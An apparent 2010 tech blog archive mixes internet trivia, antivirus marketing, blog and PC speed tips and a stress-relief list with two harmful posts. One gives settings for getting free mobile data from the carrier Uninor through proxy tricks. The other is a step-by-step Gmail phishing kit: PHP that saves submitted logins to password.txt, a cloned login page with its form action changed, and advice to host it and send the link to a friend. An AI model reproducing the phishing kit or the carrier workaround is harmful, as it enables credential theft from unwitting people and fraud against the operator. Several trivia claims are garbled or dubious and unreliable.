Friday, December 31, 2010

Uninore GPRS free use



Uninore GPRS free use

The latest and newest born GSM Mobile service operator Uninor, launched Mobile Internet Services on GPRS on Friday 23.04.10 for its prepaid users across UP East & West, Bihar, Jharkhand, Orissa, Karnataka, Tamil Nadu, Kerala and Andhra Pradesh.
Uninor also came up with a Promotional trial of unlimited FREE browsing till May 6. Later, GPRS/Data services will be accessible at 10p/10kb.

GPRS Tariff Plans:
It comes in two GPRS plans, myconnect 9 and myconnect 90 which is valid for 3 and 30 days and allows chargeless browsing up to 60 MB and 3 GB respectively.
For both GPRS plans, usage above limit will be rated at 10p per 10kb and allow access to social networking sites such as Facebook, Twitter and Linked-In.


GPRS Settings:
Users don’t have to seek and download GPRS settings. Uninor’s Automatic Device Setting Server will download settings as soon as insert the SIM. The server detects the phone make and automatically sends settings. Accept and start surfing.

WAP Portal:
The "Myuninor WAP portal" has only 6 icons on the homepage and has got a lot. The portal will be faster and you don’t have to waste time and money for browsing. MMS charges will be Rs. 5.
The Executive Vice-President Western Hub-Uninor, Mr. Olav Sande said “We had declared beforehand that a lot can be done with the opportunities already accessible on 2G platforms to give a good quality data experiences and services. We make that start today,”
Uninor is the latest enterant in the telecom arena in India. Uninor offers very attractive tariff plans for both calls, sms and GPRS. And Like all the other service providers, Uninor too has some loop holes for using FREE GPRS!
In order to use GPRS for free on a Uninor mobile connection, just use the following mentioned settings on your mobile device:

            IP 83.096.168.5
            PORT 9201 or 9280 (one of them should work)
            APN UNINOR
            H.P. wap.google.com
In case you know of any other settings for FREE gprs usage on uninor network then do let us know.

            NOTE: The above mentioned settings have NOT been discovered by me. Moreover, these settings will work till the time Uninor discovers them and patches this loop hole.
Now uninor gprs has been successfully hacked again here is the trick which helps you to  hack your uninor gprs for free,this trick works truthfully and it is found working by changing some changes in settings just listen to the trick which i have explained below carefully and use the trick to hack  free uninor mobile gprs.

            Features:
v     You can get connected this gprs facility in laptop or others desktops through mobile as a moded.
v     You can also use this trick in balance above 100rs.
v     No charges will be applied.
v     You can browse from the range of  30-35kb/s.

            Requirement:
v     Opera mini with new or old versions suitable for your mobile phone.

Users procedure:
v     download opera mini and if the application is old version then it is suitable,in the operator trick menu,you could find “http server”.
v     now in this option replace the address given in that coloumn (http://m.facebook.com.server4,operamini.com:80/)
and now save use the following setting in your configuration settings.

Connection Name:Uninor
Access point : Uninor
I.P: 10.58.10.58
Port: 8080
Homepage: wap.uninor.in

Now you have done, You can use uinore GPRS free, If this is not working, you can post comment and tell me, I will try to resolve your problem.










Wednesday, December 29, 2010

125 Facts About Internet and Technology

 125 Facts About Internet and Technology




  • The English once took it to be an alphabet. The Chinese affectionately term it ‘the little mouse’. The Dutch call it an ‘elephant’s trunk’, the Germans a spider monkey, the Italians as a snail. It is ‘&’ (ampersand).




  • The inspiration for the brand name Yahoo! Came from a word made up by Jonathan Swift in his book Gulliver’s Travels. A Yahoo was a person who was ugly and not a human in appearance.




  • The prime reason the Google home page is so bare, is due to the fact that the founders didn’t know the HTML and just wanted a quick interface. In fact, the submit button was a later addition and initially, hitting the RETURN key was the only way to burst Google into life.




  • Sweden has the highest percentage of its population i.e. 76.9 per cent hooked on to the Internet. In contrast, the world average is 11.9 per cent and India has a poor 7.2 per cent.




  • The Dilbert Zone was the first comic website on the Internet.




  • A resident of Tonga could have the rights to register domains ending in .to as Tongo’s Internet code is .to. Such possibilities are fun to consider: travel.to or go.to.




  • The day after Internet Explorer 4 was released, a few Microsoft employees left a 10 by 12-foot Internet Explorer logo on Netscape’s front lawn with a message that said “We love you” at the height of the browser wars in the late 90’s.




  • The world ‘e-mail’ has been banned by the French Ministry of culture. They are required to use the word ‘Courriel’ instead, which is the French equivalent of Internet. This move became the subject of ridicule from the cyber community in general.




  • Did you know that www.symbolics.com was the first ever domain name registered online?




  • According to a University of Minnesota report, researchers estimate the volume of Internet traffic is growing at an annual rate of 50 to 60 per cent.





  • The term Internet and World Wide Web are often used in every-day speech without much distinction. However, the Internet and the World Wide Web are not one and the same. The Internet is a global data communications system. It is a hardware and software infrastructure that provides connectivity between computers. In contrast, the Web is one of the services communicated via the Internet. It is a collection of interconnected documents and other resources, linked by hyperlinks and URLs.




  • In February 2009, Twitter had a monthly growth (of users) of over 1300 per cent several times more than Facebook.




  • The first graphical Web browser to become truly popular was Marc Andresen and Jamie Zawinski’s NCSA Mosaic. It was the first browser made available for Window’s, Mac and Unix X windows System with the first version appearing in MARCH 1993.




  • The cost of transmitting information has fallen dramatically. A trillion bits of information from Boston to Los Angeles from $150,000 in 1970 to 12 cents today. E-mailing a 40 page document from Chile to Kenya costs less than 10 cents, faxing it about $10, sending it by courier $50.




  • The typical Internet user worldwide is young, male and wealthy – a member of an elite minority.




  • The average total cost of using a local dialup Internet account for 20 hours a month and USD 60 a month in the US. The average African monthly salary is less than USD 60.




  • Before they can read, almost one in four children in nursery school are learning a skill that even some adults have yet to master: using the Internet, about 23per cent of children in nursery school – kids age 3,4 or 5 – have gone online.




  • at the end of the 20th century, 90 per cent of data on Africa was stored in Europe and the United States.



  • Facebook now has 24 million users who spend an average of 14 minutes on the site every time they visit. This is up from 8 minutes last September, according to Hit wise, a traffic measuring service.





  • MySpace has 67 million numbers - nearly 3 times as many as Facebook! MySpace users spend an average of 30 minutes on the site each time they visit.




  • if you want to sell your book on amazon.com you can set the price, but then they will take 55 per cent cut and leave you with only 45 per cent.




  • R Tomlinson was the first person on records to have sent an email. His email address was: tom-linson@bbn.tenexa. He had invented this software that allowed messages to be sent between computers. He is also credited with the use of the @ in email addresses.




  • Counting only domain name sites with content, Netcraft has tracked the growth of the internet since 1995 and says of the 100 million; around 48 million are active sites that are updated regularly. When it began observing sites through the domain name system in 1995, there were 18,000 web sites in existence.




  • On the internet, a ‘bastion host’ is the only host computer that a company allows to be addressed directly from the public network.





  • Around 1 per cent of the world’s 650 million corporate e-mail accounts are plugged into hardware and software that forwards incoming messages to a mobile device. And about 3.65 million of them us a Blackberry.




  • Almost half of people online have at least three e-mail accounts. In addition the average consumer has maintained the same e-mail address for four to six years.




  • Spam accounts for over 60 per cent of all email, according to Message Labs. Google says at least one third of all Gmail servers are filled with spam.




  • Yahoo started out as “Jerry and David’s guide to the world Wide Web”. Jerry Yang and David Filo were PhD candidates at Stanford in 1994 when they started the site.




  • . The first Web browser was already capable of downloading and displaying movies, sounds and any file type supported by the operating system.




  • ‘Carnivore’ is the Internet surveillance system developed by the US Federal Bureau of Investigation (FBI), who developed it to monitor the electronic transmissions of criminal suspects.




  • Anthony Greco, aged 18, became the first person arrested for spam (unsolicited instant messages) on February 21, 2005.




  • A NeXT computer used by Tim Berners-Lee was the world’s first web server.




  • The first web site was built at CERN. CERN is the French acronym for European Council for Nuclear Research and is located at Geneva, Switzerland.




  • The World Wide Web is the most extensive implementation of the hypertext but it is not the only one. A computer help file is actually a hypertext document.




  • The concept of style sheets was already in place when the first browser was released.




  • Worldwide Web was programmed with Objective C.




  • Hypertext is implemented in the web as links in the browser window. Links are references to text that the user wants to access. When a link is clicked the referenced text is displayed or brought into focus.




  • The address of the world’s first web server is http://info.cern.ch/ The URL of the first web page was http://nxoc01.cern.ch/hypertext/WWW/TheProject.html. Although this page is not hosted anymore at CERN, a later version of the page is posted at http://www.w3.org/History/199921103hypertext/hypertext/WWW/TheProject.html.




  • In December 1991, the first institution in the US to adopt the web was the Stanford Linear Accelerator center (SLAC). True to the Berners-Lee vision, it was used to display an online catalog of SLAC’s documents.





  • Marc Andreessen started Netscape and released Netscape Navigator in 1994. during the height of its popularity, Netscape Navigator accounted for almost 90 per cent of all web use.




  • The first browser that made the web available to PC and Mac users was Mosaic. It was developed by National Center for Supercomputing (NCSA) led by Marc Andreessen in February, 1993. Mosaic was one of the first graphical web browsers and led to an explosion in web use.




  • April 30, 1993 is an important date for the Web because on that day, CERN announced that anyone may use WWW technology freely.




  • Microsoft released Internet Explorer on 1995. This event initiated the browser wars. By bundling internet explorer with the Windows operating system, by 2002, Internet Explorer became the most dominant web browser with a market share over 95 per cent.




  • It was in the Conference Dinner in May 26, 1994 where the first Best of WWW awards were given. It was by pure coincidence that the jazz band that played during the awards was called “Wolfgang and the Were Wolves”.



  • Only 4 per cent of Arab women use the Internet. Moroccan women represent almost a third of that figure.




  • As of July 2009, Microsoft Internet Explorer accounted for 67.68 per cent of all browsers used Mozilla Firefox was used by 22.47 per cent of all users.




  • The development of standards for the World Wide Web is managed by the W3C or the World Wide Web consortium. The W3C was founded in October, 1994 and headed by Tim Berners-Lee.




  • The first White House website was launched during the Clinton-Gore administration on October 21, 1994. Coincidentally, the site www.whitehouse.com linked to a pornography web site.




  • . Open source technology dominates the web. The most common software used for web serving is called LAMP standing for the Linux operating system, apache web server, MySql database and PHP scripting language.




  • . The “www” part of a web site (www.google.com) is optional and is not required by any web policy or standard.




  • 1Despite IPv4’s 4.3 billion unique addresses, it is forecasted that by 2011, the address space will be consumed. A newer scheme called IPv6 is slowly replacing IPv4 in some countries. IPv6 has the capability to address 2128 computers. to give perspective to this very big number, the world's population of 6.5 billion people as of 2006 can be given 295 unique addresses.




  • YouTube's bandwidth requirements to upload and view all those videos cost as much as 1 million dollars a day and drawing. The revenues generated by YouTube cannot pay for its upkeep.




  • The blue colored links on a web page is just a browser default because way back on the days when monitors only had 16 colours, blue was the darkest colour that did not affect text legibility.




  • All three letter word combinations from aaa.com to zzz.com are already registered as domain names.




  • Around 75 per cent of the music that is available for download has never been purchased and it is costing money just to be on the server.





  • One million domain names are registered every month.




  • According to AT&T vice president Jim Cicconi, 8 hours of video is uploaded into YouTube every minute. This was on April 2008. On May 21, 2009, YouTube received 20 hours of video content per minute.




  • Of the 13 million music files available on the web, 52,000 tunes accounted for 80 per cent of download.




  • By 2012 it has been said that there will be 17 billion devices connected to the internet. In most of Asia, mobile phones are leading the way to internet connectivity.




  • The term Deep Web is used to refer to a wealth of information that is at least 400 to 550 times larger than the searchable Internet. This content consisting of most of the information on today's active websites is stored in databases which are invisible to search engines. this information contains data such as prices of items, airfares and other stuff that will never surface unless somebody queries for that information. The Deep Web and all that hidden information is what prevents search engines from giving us a definitive answer to simple questions like "How much is the cheapest airfare from New York to London next Thursday?"








  • In a recent survey conducted by security specialist Symantec of the 100 most unsafe and malware infested web sites, 48 per cent of them feature adult content.




  • Naked women make up 80 per cent of all the pictures on the internet.




  • . The online population of Facebook, 250 million users worldwide, and MySpace, which had 100 million accounts by 2007, are bigger than the populations of many nations worldwide. On April 2008, Facebook overtook MySpace in terms of monthly visits.




  • . It took the web only 4 years to reach 50 million users. Radio took 38 years while TV made it in 13 years.




  • Amazon.com was formerly known as Cadabra.com




  • A blogger Kyle MacDonald, made history in 2006 by trading his way to glory. Starting out with a paper clip, he traded his way to increasingly costlier items and of value including a year’s rent and an afternoon with the Alice Cooper. He eventually traded a film role for a two-storey farmhouse Kipling, Saskatchewan.




  • Bit torrents, depending on location, are estimated to consume 27 to 55 per cent of all internet bandwidth as of February, 2009.




  • Domain registration was free until the National Science foundation decided to change this on September 14th, 1995.




  • It is estimated that one of every eight married couples started by meeting online.




  • Lee Stein invented the first online electronic bank in 1994 entitled, "First Virtual Holdings".








  • . The Internet is roughly 35% English with the Chinese at 14%. Yet only 13% of world's population i.e. 812 million are Internet users as of December 2004. North America has the highest continental concentration with 70 per cent of the populace using the Internet.




  • . Official statistics in the UK say that 29 per cent of women have never used the internet, but only 20 per cent of men.




  • . In 1995, Bob Metcalfe coined the phrase 'The Web might be better than sex'.




  • Iceland has the highest percentage of the Internet users at 68 per cent. The United States stands at 56%. 34% of all Malaysians us the Internet while only eight per cent of Jordanians are connected, 4% of Palestinians; 0.6% of Nigerians and 0.1% of Tajikistanis.




  • Employees at Google are encouraged to use 20 per cent of their time working on their own projects. Google News, Orkut are both examples of projects that grew from this working model.




  • Afghanistan has a combined telephone penetration of 3.4 per cent.




  • Someone is a victim of a cybercrime every 10 seconds and it is on the rise.




  • The first search engine for Gopher files was called Veronica, created by the University of Nevada System Computing Services group.




  • The Electrohippies Collective (Ehippies) is an international group of internet activists based in Oxfordshire, England, whose purpose is to express disapproval of governmental policies of mass media censorship and control of the Internet "in order to provide a 'safe environment' for corporations to do their deals."





  • Luking is to read through mailing lists or news groups and get a feel of the topic before posting one's own message.




  • The Internet was called the 'Galactic Network' in memos written by MIT's JCR Licklider in 1962.




  • The first internet worm was created by Robert Morris, Jr, and attacked more than 6,000 Internet hosts.




  • SRS stands for Shared Registry Server which is the central system for all accredited registrars to access, register and control domain names.




  • The search engine Lycos is named after Lycosidae which is a Latin name for the wolf spider family.




  • It is believed that Subhash Ghai's film Taal was the first bollywood movie to be widely promoted on the internet.




  • Rob Glasser's company Progressive Networks launched the RealAudio system on April 10, 1995.




  • Butter Jeeves of the internet site AskJeeves.com made its debut as a large helium balloon in the Macy's Thanksgiving Day parade in 2000.




  • In Beijing, the internet community has coined the word 'Chortal' as a shortened version of 'Chinese' Portal.




  • Satyam Online became the first private ISP in December 1998 to offer internet connection in India.




  • In 1946, the Merriam Webster defined a computer as a person who tabulates numbers, accountant, actuary, book keeper.




  • In 1969, advanced Research Projects Agency (ARPA) went online connecting four major US universities. The idea was to have a backup in case a military attack destroyed conventional communication system.




  • The first ever ISP was CompuServe which still exists under AOL, Timer Warner.




  • Jeff Bezos while starting his business could not name his website Cadabra due to copyright issues. He later named it amazon.com.




  • The longest phone cable is a submarine cable called FLAG (Fiber-Optic Link Around the Globe). It spans 16,800 miles from Japan to the United Kingdom and can carry 600,000 calls at a time.




  • 95. The first coin operated machine ever designed was a holy-water dispenser that required a five-drachma piece to operate. It was the brainchild of the Greek scientist Hero in first century A.D.






  • Since Google’s centerpiece in search technology was patented by Stanford University (on behalf of the founders Larry Page & Sergey Brin), Google gave Stanford 1.8 million shares for exclusive right to the patent that the university later sold for a staggering $336 million.




  • Google earns 97 percent of its revenues from advertising alone. This amounts to $20 billion.




  • Did you know that Google logs each search queries into its systems to enhance future searches?





  • They have found in user testing, that a small number of people are very typical of the larger user base. They run labs continually and always monitor how people use a page of results.




  • Google has the largest network of translators in the world; this is needed for continuously integrating searches and indexing web pages into their engine.




  • The reason Orkut doesn’t look or feel like a Google application was that the designer in-charge was given free reign to do things his way without the usual company procedures. Google is looking to improve Orkut’s resource utilization however.




  • Google makes small changes on their products very often. They sometimes try a particular feature with a set of users from a given network or region; for example Excite@Home users often get to see new features. They aren’t told of this, just presented with the new UI and observed how they use it.








  • The infamous “I feel lucky” is nearly never used. However, in traits it was found that removing it would somehow reduce the Google experience. Users wanted it to be kept. It was like a comfort button.








  • When Google was founded, Sergey Brin and Larry Page, the founders tossed a coin to decide what position they would take.








  • Notice the logos appearing on your Google homepage around major events or holidays? This is known as the Google Doodle. The first one was dedicated to the Burning Man festival in 1998. You can check out past Google doodles at google.com/logos.








  • By July 2008, Google had indexed an astounding 1 trillion (1000000000000) pages on the Internet.








  • Heard of Mentaplex? It was an April fool’s joke that Google could read peoples minds and search the Internet for what they were thinking of. The joke also included broadband access wires coming out from people’s toilet bowls! Try it out at http://www.google.com/mentalplex








  • Larry Page, the co founder of Google once made an inkjet printer out of Lego blocks when he was in college.








  • There are more then 600 million phones. Even then, more than half the population of the entire world hasn’t yet made a phone call.








  • All three founders of YouTube, Steve Chen, Chad Hurley and Jawed Karim were working for PayPal when they started YouTube.








  • Did you know that the domain YouTube.com was registered on Valentine's Day (February 14, 2005)








  • YouTube loves young Americans? Here’s proof: 70 percent of the YouTube’s registered users are from USA and half of YouTube users are under 20 years old.








  • If YouTube was Hollywood, they have enough material to release 60,000 new films every week.








  • One of the biggest leaps in Google’s search engine usage came about when they introduced their much improved spell checker giving birth to the “Did you mean…” This instantly doubled their traffic.








  • The total amount of bandwidth used by YouTube is about the same as used by entire Internet in 2000.








  • One needs over 1000 years of time to watch all videos on YouTube (but there will be billion of more videos uploaded on YouTube by then.)








  • Most popular category for uploder videos is ‘Music’ having around 20 percent YouTube videos.








  • Gmail was internally used for nearly 2 years prior to launch to the public. They discovered there were approximately 6 types of email users, and Gmail has been designed to accommodate all of these.









  • United States uses upload most of YouTube videos followed by UK. Americans are also the number-one watchers of YouTube videos followed by Japan.








  • The first ever video that was uploaded on YouTube is by Jawed Karim (one of YouTube founders) titled “Me at zoo” on April 23rd, 2005. This video is all of 18 seconds long.








  • There isn’t any restriction for proper dress code in the Google offices. This is to ensure comfort and a productive working environment. So one may dress up in pajamas or even as a superhero.








  • Tom Vendetta is the youngest Google employee ever hired. He was hired by Google when he was just 15 years old. Vendetta used to fool his friends by sending fake press releases and news. Vendetta was employed because he was young and would know young hackers thought. His job was to help address security flaws in Gmail.








  • Google consists of over 450,000 servers, racked up in clusters located in data centers around the world.








  • The first ever search engine was called “Archie” and was created way back in 1990 by a Canadian student Alan Emtage.








  • In 2007, Google became the most visited website with 700 million users. It beat the next popular website, Microsoft.com by over 200 million hits. In March 2010, Facebook overtook Google!











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    Tuesday, December 28, 2010

    Internet Security Publisher's Description for Panda

    Internet Security Publisher's Description for Panda
    Panda Internet Security is a security suite that lets you use the Internet with complete peace of mind. It protects you from viruses, spyware, rootkits, hackers, online fraud, identity theft and all other Internet threats. The anti-spam engine will keep your inbox free from junk mail while the Parental Control feature ensures your children can use the Web safely. And thanks to the new Collective Intelligence technology, the solution is now much faster than previous versions.

    Automatically detects and eliminates viruses, spyware, Trojans, rootkits, bots and other malware before they infect your computer.

    * Scans files in real-time and on-demand.
    * Scans emails before they reach your inbox, regardless of your email program.
    * Scans Internet traffic regardless of your browser type.
    * Scans Instant Messaging traffic in MSN Messenger, Windows Live Messenger, Yahoo Messenger and AOL.
    * Removes all traces of clutter left by spyware on your PC.

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    Technologies from Panda Security are widely recognized as the most effective against new and unknown malware.

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    Recognizes fraudulent email and protects you from scams while you shop, bank or pay bills online.
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    Lets your children browse the Internet safely by blocking access to violent, adult, or racist content, as well as other inappropriate websites. From the solution’s control panel –and regardless of the browser type- you can assign predefined filters (child, adolescent, employee…) to users or customize filter rules according to your specific needs, .


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    Lets you use the Internet safely without the risk of infections, vulnerability exploits, browser hijacking or phishing websites.By analyzing website content, links and Web reputation scores, Panda Security provides protection against all types of Web-based malware and scams. NEW!
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    Sunday, December 19, 2010

    Speedup Your Blog

    Speedup Your Blog

    Basically, the speed with which your blog loads is inversely proportional to the time it takes to load. I have explained this post in terms of reducing the load time. More over, when browsing the net, I found an article which mentioned that even the site/blog load time contributes significantly to the Google PR. So, how do I find out whether my site load time is quick or slow. If you need an answer to this question, then visit the following link "Website Optimization Speed Report" and enter your URL to have a complete report about your site load time. Scroll to the end of the report page and you will notice various sections say TOTAL_HTML, TOTAL_OBJECT and so on. Each section will be highlighted either in red or green or yellow. So, what do they indicate. The report will clearly explain the color and its significance. How ever, I would like to briefly say that, it indicates the areas where you need to concentrate so as to improve the speed of loading your website. Red indicates immediate attention while yellow indicates moderate attention and green signifies an optimal performance. I suggest you to read each and every line of that report before you proceed with this post. The report will clearly specify what scripts or images can be compressed and how much bytes could be saved by doing so. Once you have analyzed the above report, it is time to take few steps to reduce the load time. Although, there are various methods through which the load time can be reduced, I restrict myself to the most effective methods in this post. Now, let's move on to the methods!!!

  • 1. SIMPLY THE CSS SECTION: This method involves the compression of the CSS section of your blogger template. To do this, just visit the following link "Free Web Based CSS Compressor" and paste the CSS part of your blogger template. Once you paste the code, hit the compress button and you will find the reduced version of the CSS code. Now, replace this code instead of the CSS part of your template and save it. Ensure that, there is no problem after replacing the code by having a preview of your blog. (Note: Before trying this step, please make a back up of your template. More over, the CSS part of your template is the code which lies between the  andcode.)



    • 2. POSTS ON HOMEPAGE: The earlier versions of blogger/blogspot blogs did not include the "Read More" hack and people displayed the entire post on the blogs. How ever, this trend has reduced in the new version of blogger to some extent. Still, there are blogs where in , the home page includes so many number of posts that it becomes completely annoying for the visitor who visits the blog. Apart from losing a visitor, you lose the impressions and the bounce rate of your blog also increases.So, reduce the number of posts on your home page. To do so, navigate to Settings->Formatting from dashboard and enter 4 or 5 for your blog with the "Read More" hack installed in your blog.



  • 3. IMAGES OF YOUR BLOG: The images displayed in your blog play a very vital role in your site load time. The images when hosted at different sites say "Imageshack, Photobucket, etc.." contribute a significant load time. This is due to the diversity of your images, that is, your images have to be fetched from different servers. To avoid this, you may use a single server to host your images. Say use only Photobucket to host all your images. Thereby, you fetch multiple images from only one server and it reduces the load time drastically. Moreover, you may compress the images which you host, thereby the images will load faster than what it did, before compression. 4. AVOID SCRIPTS: The scripts that are included in your blog templatealso plays a vital role in the loading time of your website. Try to remove the scripts which you feel are unwanted. Apart from the scripts, remove the widgets which are unnecessary from your blog too. So, how do I decide a widget is important or not? Just ask the following questions to your self and you will have a conclusion. Firstly, Does the widget offer some value to your readers? Secondly, Does the widget match with your template, that is, provides an overall professional look? And lastly, Do you receive complains from your blog readers about the widget(say it disturbs them from reading the post)??? If you end up answering "No" to the first two questions or "Yes" to the last question, then I recommend you to remove that widget now!!








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    Live Lifw Without Stress



    “If you ask what is the single most important key to longevity, I would have to say it is avoiding worry, stress and tension. And if you didn’t ask me, I’d still have to say it.” - George F. Burns

    Stress is a major problem — a hectic, stressful job, a chaotic home life, bills to worry about, and bad habits such as unhealthy eating, drinking and smoking can lead to a mountain of stress.
    If your life is full of stress, like mine once was, there are some simle things you can do to get your life to a more stressless manageable level.
    Now, your life will probably never be stress-free — I don’t think that’s even desirable, even if it is possible, because stress is something that challenges us and helps us grow. At a reasonable level. But when stress gets too high, it causes us to be unhappy and unhealthy.
    It wasn’t that long ago when I was working long hours in a very stressful job, with little time for my family, smoking and eating fatty foods and not exercising. I had a lot of debt and too many bills. I was unhappy and stressed out all the time. I was losing hair … OK, actually that was because of genetics, but still. I was pretty stressed.
    So I made some drastic changes. I quit my job. I simplified my life. I quit smoking and started exercising and eating healthier. I began to eliminate my debt. And I learned some habits that, when applied on a daily basis, can really transform the way you live, in a positive way.
    How did I do all of this? One thing at a time. I didn’t do a major rehaul of my life. I changed one habit a month, and gradually over the course of a year or two changed a lot of things in my life.
    I won’t guarantee that all of these will work for you. They worked for me, but each person is different. Pick and choose the ones that will work best for you, and give them a try. One at a time.
    1. One thing at a time. This is the simplest and best way to start reducing your stress, and you can start today. Right now. Focus as much as possible on doing one thing at a time. Clear your desk of distractions. Pick something to work on. Need to write a report? Do only that. Remove distractions such as phones and email notifications while you’re working on that report. If you’re going to do email, do only that. This takes practice, and you’ll get urges to do other things. Just keep practicing and you’ll get better at it.
    2. Simplify your schedule. A hectic schedule is a major cause of high stress. Simplify by reducing the number of commitments in your life to just the essential ones. Learn to say no to the rest — and slowly get out of commitments that aren’t beneficial to you. Schedule only a few important things each day, and put space between them. Get out of meetings when they aren’t absolutely essential. Leave room for down time and fun.

    3. Get moving. Do something each day to be active — walk, hike, play a sport, go for a run, do yoga. It doesn’t have to be grueling to reduce stress. Just move. Have fun doing it.
    4. Develop one healthy habit this month. Other than getting active, improving your health overall will help with the stress. But do it one habit at a time. Eat fruits and veggies for snacks. Floss every day. Quit smoking. Cook something healthy for dinner. Drink water instead of soda. One habit at a time.
    5. Do something calming. What do you enjoy that calms you down? For many people, it can be the “get moving” activity discussed above. But it could also be taking a nap, or a bath, or reading, or having sex (which can also be considered a “get moving” activity if you do it for longer than 5 minutes). Other people are calmed by housework or yardwork. Some people like to meditate, or take a nature walk. Find your calming activity and try to do it each day.
    6. Simplify your finances. Finances can be a drain on your energy and a major stressor. If that’s true with you, figure out ways to simplify things. Automate savings and bill payments and debt payments. Spend less by going shopping (at malls or online) much less. Find ways to have fun that don’t involve spending money.
    7. Have a blast! Have fun each day, even if it’s just for a few minutes. I like to play with my kids — they take my mind off everything and are really hilarious. I also like to play sports (again, often with my kids). Board games are fun. Sex, again, can be a fun activity. Whatever you choose, be sure to laugh.
    8. Get creative. Throwing yourself into a creative activity is another great way to de-stress and to prevent stress. I like writing, but others like to paint or play music or sketch or make pottery or do interior design or build things.
    9. Declutter. This is a favorite of mine. I like to take 20-30 minutes and just go through a room, getting rid of stuff we don’t use or need anymore. I look around at anything that’s cluttering up a room, and get rid of it or find a better place for it. When I’m done, I have a nice, peaceful enviornment for work, play, and living. Do this a little at a time — it can be one of your “fun activities”.
    10. Be early. I will admit that it’s hard to be early when you have to get 6 kids ready (seriously — try it!). But being late can be very stressful. Try to leave earlier by getting ready earlier, or by scheduling more space between events. Things always take longer than normal, so schedule some buffer time: extra time to get ready, to commute, to do errands before you need to be somewhere, to attend a meeting before another scheduled appointment. If you get somewhere early, it’s good to have some reading material.
    Tell us throgh your expensive comments, How to keep your self less stress life to a manaeable level.
    Taken from: zenhabits.net

    Friday, December 17, 2010

    How to trace your friends gmail password

    How to trace your friends gmail password

    We will we use very popular method to h ack Gmail account password. I am going to tell how to make a  fake web page to get password of your friends by little bit fun This is one of the best method to hack gmail  password. This will work only if your friend don’t know about this method of getting  gmail password.

    For this we need to create three files:
    1. A fake gmail login page file
    2. A php file
    3. Text files to store password
    Create your php file
    1. Open notepad and copy this code:
    header (“Location: https://gmail.com”);
    $handle = fopen(“password.txt”, “a”);
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, “=”);
    fwrite($handle, $value);
    fwrite($handle, “rn”);
    }
    fwrite($ handle, “rn”);
    fclose($handle) ;
    exit;
    ?>

    2.Now save this as gmailphishing.php
    Your php file is now created
    If you Don’t understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt
    Create gmail fake login page
    Now  go to http://www.gmail.com and right click / View Source.Copy source in notepad and save it as gmaillogin.html .Now open source code of this html file
    We need to find the place where Login  code in gmail page that where send the user after clicking on it.
    Now Press crtl-f after opening source code and   search for this code
    action=anything.
    In this case we have this
    We replace that part with:
    2.Now save this as gmailphishing.php Your php file is now created If you Don’t understand what this php file is doing you need to learn some basic of php. This php file will save information of victim in file password.txt
    Create gmail fake login page
    Now  go to http://www.gmail.com and right click / View Source. Copy source in notepad and save it as gmaillogin.html .Now open source code of this html file
    We need to find the place where Login  code in gmail page that where send the user after clicking on it. Now Press crtl-f after opening source code and   search for this code
    action=anything.
    In this case we have this

    action=”https://www.google.com/accounts/ServiceLoginAuth?service=mail

    and Now We replace that part with:

    action=”gmailphishing.php

    Save your gmailfake.html file
    Text file
    Create a blank text file and name it password.txt
    Now upload all the threefiles gmailfake.html,gmailphishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake gmail login page by going to http://ursite.110mb.com/gmailfake.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is created,In which the password is stored
    You can also use
    Easy-share.com
    Or just free.com
    Or such a site which provides you to upload or any other free hosting
    site.
    Suppose you register with name gmailaccounthack.Your link will behttp://www.gmailaccounhack.justfree.com/ after uploading your file, you will see publish links. Those links could be as http://www.gmailaccount.justfree.com/fakegmail.html
    now you have done, now sent this link to your friend, if they login to this page, their password will save at the server.
    In this way you can use any server, you can get any password, you can make other fake pages like twitter or facebook or yahoo, just, create it like NEW VERSION or facebook try this.
    NOTE:
    Use this on your own responsibility, post is for education only.

    Wednesday, November 10, 2010

    5 ways to speed up your PC

    5 ways to speed up your PC
    By following a few simple guidelines, you can maintain your computer and keep it running smoothly. This article discusses how to use the tools available in Windows 7, Vista, and XP Service Pack 3 (SP3) to more efficiently maintain your computer and safeguard your privacy when you're online.

    1. Free up disk space
    The Disk Cleanup tool helps you free up space on your hard disk to improve the performance of your computer. The tool identifies files that you can safely delete, and then enables you to choose whether you want to delete some or all of the identified files.
    Use Disk Cleanup to:
    •    Remove temporary Internet files.
    •    Remove downloaded program files (such as Microsoft ActiveX controls and Java applets).
    •    Empty the Recycle Bin.
    •    Remove Windows temporary files such as error reports.
    •    Remove optional Windows components that you don't use.
    •    Remove installed programs that you no longer use.
    •    Remove unused restore points and shadow copies from System Restore.
    Tip: Typically, temporary Internet files take the most amount of space because the browser caches each page you visit for faster access later.
    To use Disk Cleanup
    Window 7 users
    1.    Click Start, click All Programs, click Accessories, click System Tools, then click Disk Cleanup. If several drives are available, you might be prompted to specify which drive you want to clean.
    2.    When Disk Cleanup has calculated how much space you can free, in the Disk Cleanup for dialog box, scroll through the content of the Files to delete list.

     Disk Cleanup dialog box
    3.    Clear the check boxes for files that you don't want to delete, and then click OK.
    o    For more options, such as cleaning up System Restore and Shadow copy files, under Description, click Clean up system files, then click the More Options tab.
    4.    When prompted to confirm that you want to delete the specified files, click Yes.
    After a few minutes, the process completes and the Disk Cleanup dialog box closes, leaving your computer cleaner and performing better.
    For Windows XP users
    1.    Click Start, point to All Programs, point to Accessories, point to System Tools, and then click Disk Cleanup. If several drives are available, you might be prompted to specify which drive you want to clean.
    2.    In the Disk Cleanup for dialog box, scroll through the content of the Files to delete list.
    Choose the files that you want to delete.
    3.    Clear the check boxes for files that you don't want to delete, and then click OK.
    4.    When prompted to confirm that you want to delete the specified files, click Yes.
    After a few minutes, the process completes and the Disk Cleanup dialog box closes, leaving your computer cleaner and performing better.

    2. Speed up access to data
    Disk fragmentation slows the overall performance of your system. When files are fragmented, the computer must search the hard disk when the file is opened to piece it back together. The response time can be significantly longer.
    Disk Defragmenter is a Windows utility that consolidates fragmented files and folders on your computer's hard disk so that each occupies a single space on the disk. With your files stored neatly end-to-end, without fragmentation, reading and writing to the disk speeds up.
    When to run Disk Defragmenter
    In addition to running Disk Defragmenter at regular intervals—monthly is optimal—there are other times you should run it too, such as when:
    •    You add a large number of files.
    •    Your free disk space totals 15 percent or less.
    •    You install new programs or a new version of Windows.
    To use Disk Defragmenter:
    Windows 7 users
    1.    Click Start, click All Programs, click Accessories, click System Tools, and then click Disk Defragmenter.
     
    Click Analyze disk to start the Disk Defragmenter.
